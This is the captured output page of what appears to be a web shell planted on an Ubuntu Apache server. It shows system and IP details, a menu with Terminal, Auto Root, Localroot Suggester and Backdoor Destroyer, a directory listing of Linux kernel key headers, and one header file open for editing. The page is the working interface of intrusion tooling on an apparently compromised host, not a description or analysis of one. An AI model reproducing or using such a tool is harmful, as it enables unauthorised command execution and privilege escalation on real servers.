Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-6.8.0-124 /
include /
keys /
Delete
Unzip
Name
Size
Permission
Date
Action
asymmetric-parser.h
1012
B
-rw-r--r--
2024-03-10 20:38
asymmetric-subtype.h
1.66
KB
-rw-r--r--
2024-03-10 20:38
asymmetric-type.h
2.96
KB
-rw-r--r--
2024-03-10 20:38
big_key-type.h
816
B
-rw-r--r--
2024-03-10 20:38
ceph-type.h
162
B
-rw-r--r--
2024-03-10 20:38
dns_resolver-type.h
482
B
-rw-r--r--
2024-03-10 20:38
encrypted-type.h
1.09
KB
-rw-r--r--
2024-03-10 20:38
keyring-type.h
337
B
-rw-r--r--
2024-03-10 20:38
request_key_auth-type.h
747
B
-rw-r--r--
2024-03-10 20:38
rxrpc-type.h
2.34
KB
-rw-r--r--
2024-03-10 20:38
system_keyring.h
3.82
KB
-rw-r--r--
2024-03-10 20:38
trusted-type.h
2.2
KB
-rw-r--r--
2024-03-10 20:38
trusted_caam.h
243
B
-rw-r--r--
2024-03-10 20:38
trusted_tee.h
286
B
-rw-r--r--
2024-03-10 20:38
trusted_tpm.h
2.68
KB
-rw-r--r--
2024-03-10 20:38
user-type.h
1.91
KB
-rw-r--r--
2024-03-10 20:38
Save
Rename
/* SPDX-License-Identifier: GPL-2.0-only */ /* * Copyright (C) 2021 Pengutronix, Ahmad Fatoum <kernel@pengutronix.de> */ #ifndef __CAAM_TRUSTED_KEY_H #define __CAAM_TRUSTED_KEY_H extern struct trusted_key_ops trusted_key_caam_ops; #endif